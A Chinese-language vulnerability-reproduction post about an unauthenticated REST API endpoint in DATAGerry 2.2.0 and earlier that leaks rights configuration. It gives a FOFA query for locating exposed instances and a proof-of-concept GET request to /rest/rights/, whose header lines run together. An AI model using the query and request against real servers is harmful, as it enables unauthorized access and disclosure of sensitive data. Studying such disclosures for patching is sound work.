漏洞描述
DATAGerry 2.2.0 及之前版本中的接口中REST API 端点存在未授权访问漏洞,攻击者无需身份验证即可远程访问该端点,导致敏感信息泄露。该漏洞可能暴露用户权限配置等关键数据,进一步引发权限提升或系统完整性破坏。
资产确定
fofa:
icon_hash="505564403" || title="datagerry"
漏洞复现
1.利用如下POC
GET/rest/rights/HTTP/1.1Host: {{Hostname}}Accept-Language: zh-CN,zh;q=0.9User-Agent: Mozilla/5.0 (Macintosh; IntelMacOSX10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0Safari/537.36Accept: application/json, text/plain, */*Accept-Encoding: gzip, deflate
原文始发于微信公众号(我爱林):漏洞复现 || DATAGerry 终端节点接口敏感信息泄露
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论